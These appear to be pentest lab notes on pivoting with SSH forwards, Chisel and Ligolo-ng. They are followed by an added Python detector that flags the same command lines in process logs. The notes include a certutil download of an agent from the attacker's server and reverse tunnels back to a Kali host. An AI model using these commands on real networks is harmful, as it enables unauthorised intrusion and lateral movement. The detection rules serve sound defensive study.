Port Forwarding

SSH

  • Method 1:

On Kali machine:
 sudo systemctl start ssh
 nano /etc/proxychains.conf
  # Append: socks5 127.0.0.1 <port>
  # From now on, prefix any command aimed at the internal network with proxychains

On Victim machine:
 ssh -N -R <port> kali@192.168.45.x

  • Method 2:

ssh <user>@<IP> -L <port>:127.0.0.1:<port>
 # Target 127.0.0.1:<port> to access the target machine's "hidden" port

Chisel

On Kali machine:
    ./chisel_linux server -p 8001 --reverse


On Pivot machine:
    .\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
    
    OR

    .\chisel.exe client <Kali IP>:8001 R:socks

Ligolo-ng

  1. Set up ligolo

On Kali Machine:
    sudo ip tuntap add user kali mode tun ligolo
    sudo ip link set ligolo up
    sudo ip route add <Internal net>/24 dev ligolo

    mkdir ligolo && cd ligolo
    
    mkdir proxy && cd proxy
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    mkdir ../agents && cd ../agents
    mkdir windows && cd windows
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
    unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
    
    cd ..
    
    mkdir linux && cd linux
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    python3 -m http.server 80 

On MS01:
    certutil -urlcache -split -f http://192.168.45.200/<platform>/agent.exe

  2. Initiate tunnel

On Kali Machine (~/ligolo/proxy):
    ./proxy -selfcert
    # Take note of the port this service starts on

On MS01:
    agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
        # Default port is: 11601
    
Once the agent joins the server, return to the Kali terminal:
    session
    <enter>
    ifconfig # Verify interfaces of agent
    start # Creates a tunnel that allows our kali to access the internal network
    
    # Add listeners for whatever the internal network needs to reach you on; internal hosts then connect to the pivot machine on the specified port
    listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port> 
    listener_list # Verify listener added
  • Now you can reach the internal network directly, as if it were part of your own network

  • The only difference is that the internal machines are talking to your proxy (the pivot point) instead of directly to you
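
Seen from the defending side, the command lines on this page are distinctive in process-creation telemetry. The following is an added example, not part of the original notes, that flags them. Rule names, host names and sample events are constructed, and matching on command-line text alone will miss renamed binaries or combined flags.

```python
import re

# Rules keyed to the command shapes shown on this page. Rule names are
# hypothetical labels for this example. SSH flags are case-sensitive
# (-l is a login name, -L a forward), so those two rules do not ignore case.
PORT_SPEC = r"(?:[^\s:]+:)*\d+(?=\s|$)"        # "1080" or "3306:10.0.0.5:3306"
RULES = {
    "ssh_remote_forward": re.compile(r"\bssh(?:\.exe)?\s.*(?<!\S)-R\s+" + PORT_SPEC),
    "ssh_local_forward": re.compile(r"\bssh(?:\.exe)?\s.*(?<!\S)-L\s+(?:[^\s:]+:)+\d+(?=\s|$)"),
    "chisel_reverse_client": re.compile(r"\bchisel\S*\s+client\s+\S+:\d+\s+R:\S+", re.I),
    "chisel_reverse_server": re.compile(r"\bchisel\S*\s+server\b.*--reverse\b", re.I),
    "ligolo_agent_no_cert_check": re.compile(r"-connect\s+\S+:\d+.*-ignore-cert\b", re.I),
    "certutil_download": re.compile(r"\bcertutil(?:\.exe)?\s.*-urlcache\b.*https?://", re.I),
}

def classify(cmdline):
    """Return the names of all rules that the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(events):
    """Return (host, rule) pairs for every matching process-creation event."""
    hits = []
    for ev in events:
        for rule in classify(ev["cmdline"]):
            hits.append((ev["host"], rule))
    return hits

# Constructed sample events (documentation-range addresses, made-up hosts).
SAMPLE_EVENTS = [
    {"host": "MS01", "cmdline": "certutil -urlcache -split -f http://192.0.2.10/windows/agent.exe"},
    {"host": "MS01", "cmdline": "agent.exe -connect 192.0.2.10:11601 -ignore-cert"},
    {"host": "WEB02", "cmdline": "ssh -N -R 1080 kali@192.0.2.10"},
    {"host": "WEB02", "cmdline": "ssh -l deploy build01 ls -R /srv"},   # benign
    {"host": "WS07", "cmdline": r".\chisel.exe client 192.0.2.10:8001 R:socks"},
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```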
